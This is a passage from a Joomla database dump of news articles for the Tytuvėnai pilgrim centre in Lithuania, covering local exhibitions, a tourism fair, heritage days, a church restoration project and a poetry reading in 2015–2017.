00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/tvf\\/tvf2015logo.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,0,3,'','',1,1894,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(244,332,'Sofijos Riomerienės tapybos paroda','sofijos-riomerienes-tapybos-paroda','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Parodos atidarymas, diskusija \"Individualumas portrete...\" </span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">2015 07 18 (šeštadienį) 14 val.<br /></span></p>\r\n','\r\n<p><img src=\"images/stories/naujienos/sofijar_plakatas/plakatas.jpg\" border=\"0\" alt=\"\" style=\"display: block; margin-left: auto; margin-right: auto;\" /></p>',1,0,0,44,'2015-07-15 19:14:09',135,'','2015-07-15 19:26:52',135,135,'2015-07-15 19:26:52','2015-07-15 19:14:09','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/sofijar_plakatas\\/plakatas_logo.png\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,0,132,'','',1,3480,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(256,344,'ADVENTUR 2016','adventur-2016','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">2016 m. sausio 22-24 d. Litexpo parodų ir kongresų centre Vilniuje vyks tarptautinė ir aktyvaus laisvalaikio paroda  \"Adventur 2016\".<br id=\"system-readmore\" /></span></p>\r\n','\r\n<p style=\"text-align: justify;\">J<span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">au tradiciškai šioje parodoje kartu su kitomis Kelmės rajono kultūros ir gamtosaugos įstaigomis dalyvaus ir VšĮ \"Tytuvėnų piligrimų centras\". Lankytojams bus pristatytos naujos centro teikiamos paslaugos, teminės ekskursijos, edukacinės programos, o loterijoje Jums bus suteikta galimybė dar daugiau sužinoti apie krašto tradicijas, paveldą, gamtą ir ten siūlomą aktyvų laisvalaikį. Jūsų laukia vertingi prizai. Tytuvėnų piligrimų centro darbuotojai pavaišins tik Tytuvėnų bernardinų vienuolyne gaminama ypatingų skonių Piligrimų gira.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">„Adventur“tai  vienintelė tarptautinė turizmo, kelionių ir aktyvaus laisvalaikio paroda Lietuvoje, kuri yra orientuota į turizmo paslaugų ir aktyvios gyvensenos skatinimą.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">KVIEČIAME APLANKYTI  KELMĖS SAVIVALDYBĖS STENDĄ.</span></p>',1,0,0,44,'2016-01-24 21:19:59',135,'','2016-01-24 21:21:28',135,0,'0000-00-00 00:00:00','2016-01-24 21:19:59','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/adventur.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,0,122,'','',1,3077,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(245,333,'Sofijos Riomerienės tapybos darbų paroda','sofijos-riomerienes-tapybos-darbu-paroda','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Liepos 18 dieną Tytuvėnų bernardinų vienuolyno bibliotekos salėje atidaryta Sofijos Riomerienės tapybos darbų paroda, paveikslai iš Šiaulių \"Aušros\" muziejaus fondų. Parodą pristatė ŠU Dailės galerijos direktorius Kornelius Užuotas. </span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">{gallery cols=5 orientation=horizontal width=300}stories/naujienos/tapybos_paroda{/gallery}</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Apie dailininkės kūrybą kalbėjo profesorius Mindaugas Skudutis. Parodos globėjas Tytuvėnų seniūnas Romas Čerkauskas. Parodos ir Sofijos Riomerienės 130-ties gimimo metinių paminėjimu Tytuvėnuose rūpinosi Tytuvėnų piligrimų centro direktorė Asta Vaitkevičiūtė-Kizienė ir Tytuvėnų vasaros festivalio direktorė Nijolė Saimininkienė. Parodą galima apžiūrėti iki rugsėjo 1 dienos. Po parodos atidarymo, vienuolyno refektorinėje salėje vyko diskusija \"Individualumas portrete...\" Diskusijos moderatoriai Sigitas Prancuitis ir Dainius Trumpis. </span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Rugpjūčio 1 dieną spektaklio SOFIJOS PORTRETAI.TYTUVĖNAI premjera.</span></p>',1,0,0,44,'2015-07-22 05:02:08',135,'','2015-07-22 05:09:13',135,0,'0000-00-00 00:00:00','2015-07-22 05:02:08','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/tapybos_paroda\\/main\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',9,0,131,'','',1,3794,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(283,372,'Paroda - I. Šliuželienės ir G. Kaltanienės darbai','paroda-irenos-sliuzelienes-ir-gitanos-kaltanienes-darbai','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Tytuvėnų bernardinų vienuolyno bibliotekos salėje nauja paroda - Irenos Šliuželienės ir Gitanos Kaltanienės darbai.<br /></span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">{gallery cols=5 orientation=horizontal width=300}stories/naujienos/irenos_paroda/pics{/gallery}</span></span></span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Kviečiame apsilankyti.Paroda veiks visą vasarą.</span></span></span></p>',1,0,0,44,'2017-05-08 04:20:47',135,'','2017-05-08 04:22:13',135,0,'0000-00-00 00:00:00','2017-05-08 04:20:47','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/irenos_paroda\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,0,96,'','',1,2784,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(247,335,'2015-09-18 Europos paveldo dienos','2015-09-18-europos-paveldo-dienos-paveldekime-savo-ateiti','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Kelmės rajono savivaldybė, Kelmės krašto muziejus, Tytuvėnų piligrimų centras, Kražių M. K. Sarbievijaus kultūros centras ir Vilniaus dailės akademijos Telšių fakultetas kviečia:<br />2015-09-18 (penktadienį) <br />2015 M. EUROPOS PAVELDO DIENOS<br />„Paveldėkime savo ateitį“<br /></span></p>\r\n','\r\n<p><img src=\"images/stories/naujienos/epd_plakatas_2015_ok.jpg\" border=\"0\" alt=\"\" /></p>\r\n<p> </p>',1,0,0,44,'2015-09-08 11:49:23',135,'','2015-09-10 12:14:16',135,0,'0000-00-00 00:00:00','2015-09-08 11:49:23','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/paveldekime_savo_ateiti.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',7,0,129,'','',1,3126,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(248,336,'Baigtas įgyvendinti projektas','baigtas-igyvendinti-projektas','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Projektas ,,Tytuvėnų Švč. Mergelės Marijos bažnyčios restauravimas ir pritaikymas viešojo kultūrinio turizmo reikmėms, II etapas‘‘ pradėtas įgyvendinti 2013 m. balandžio 3 d. ir baigtas 2015 m. rugsėjo 30 d.</span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">{gallery cols=5 orientation=horizontal width=300}stories/naujienos/baigtas_projektas2/photos/{/gallery}</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Projektui suteiktos Europos regioninės plėtros fondo ir Lietuvos Respublikos valstybės biudžeto lėšos. Projekto biudžete nustatyta didžiausia projekto tinkamų finansuoti išlaidų suma – <strong>1 250 056,79 Eur</strong>.</span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Šio projekto metu darbai buvo atliekami dviem etapais. Pirmos eilės darbų metu atlikta bažnyčios fasadų, panduso restauracija, pakeisti seni langai, restauruotos grotos. Antros eilės darbų metų įrengta alsuojanti nuogrinda ties bažnyčia, restauruota  ir konservuota fasade tapyba, restauruotos ir konservuotos skulptūros, atlikti elektros darbai.<br /><br /></span></p>',1,0,0,44,'2015-10-08 09:52:41',135,'','2015-10-08 09:55:39',135,0,'0000-00-00 00:00:00','2015-10-08 09:52:41','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/baigtas_projektas2\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,0,128,'','',1,3236,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(260,348,'Poezijos skaitymai','poezijos-skaitymai','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Trečioje gavėnios savaitėje prisiminsime ir pagerbsime kun. Ričardą Mikutavičių, kurio gimtadienį vasario 26 dieną Tytuvėnų bažnyčioje bus aukojamos Šv. Mišios, kalbamas rožinis.</span></span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Poezijos skaitymai skirti kun. Ričardui Mikutavičiui šiemet  kovo 4 dieną, penktadienį, 17 valandą, Tytuvėnų bernardinų vienuolyno refektorinėje salėje.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Poeziją skaitys aktorė Doloresa Kazragytė. KVIEČIAME PASIKLAUSYTI.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Jūsų auka-pagalba rengėjams ir bilietas į renginį. Dėkojame.<br />VšĮ “Tytuvėnų piligrimų centras”</span></p>\r\n<p style=\"text-align: left;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><img src=\"images/stories/naujienos/poezija/1.jpg\" border=\"0\" alt=\"\" /></span></p>\r\n<p> </p>\r\n<p> </p>\r\n<p> </p>',1,0,0,44,'2016-02-10 06:49:16',135,'','2016-02-11 06:28:52',135,0,'0000-00-00 00:00:00','2016-02-10 06:49:16','0000-00-00 